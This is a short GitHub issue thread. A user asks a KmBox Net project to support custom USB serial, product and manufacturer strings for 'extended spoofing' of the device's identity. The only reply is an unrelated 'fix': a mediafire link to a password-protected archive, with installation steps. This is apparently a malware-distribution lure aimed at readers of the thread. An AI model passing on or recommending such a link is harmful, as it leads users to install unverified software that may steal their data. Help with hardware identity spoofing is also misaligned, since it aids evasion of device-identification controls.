### ISSUE TITLE
[Feature Request] Add support for iSerialNumber, iProduct, and iManufacturer.

### ISSUE THREAD

**Issue by clean-sys** [kvmaibox/kmboxnet#10]
All firmwares currently show a blank iSerialNumber, iProduct, and iManufacturer. 
This would be a great feature to add to the KmBox Net Tools and allow for proper extended spoofing.

![image](https://github.com/user-attachments/assets/4ad1c418-d685-479a-a91e-2f5687a119ef)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
